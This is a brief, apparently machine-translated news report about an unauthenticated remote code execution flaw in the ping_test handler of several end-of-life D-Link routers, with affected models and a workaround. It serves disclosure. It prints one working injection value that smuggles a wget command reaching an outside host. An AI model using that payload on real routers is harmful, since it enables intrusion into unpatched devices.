In D-Link wireless routers dangerous vulnerability () that allows you to remotely execute code on the device side by sending a special request to the "ping_test" handler, available without authentication.
Interestingly, according to the idea of the firmware developers, the “ping_test” call should be performed only after authentication, but in fact it is called in any case, regardless of entering the web interface. In particular, when accessing the apply_sec.cgi script with the "action=ping_test" parameter passed, the script redirects to the authentication page, but at the same time performs the action associated with ping_test. To execute the code, another vulnerability was used in ping_test itself, which calls the ping utility without proper verification of the correctness of the IP address transmitted for testing. For example, to call the wget utility and send the results of the “echo 1234” command to an external host, just specify the parameter “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$( echo 1234)".
The presence of the vulnerability is officially confirmed in the following models:
- DIR-655 with firmware 3.02b05 or older;
- DIR-866L with firmware 1.03b04 or older;
- DIR-1565 with firmware 1.01 or older;
- DIR-652 (data on the versions of problematic firmware are not provided)
The support time for these models has already expired, so D-Link , which will not release updates for them to fix the vulnerability, does not recommend using and advises replacing them with new devices. As a security workaround, you can restrict access to the web interface to only trusted IP addresses.
Later it turned out that the vulnerability also models DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 and DIR-825, for which no updates are yet known.
Source: opennet.ru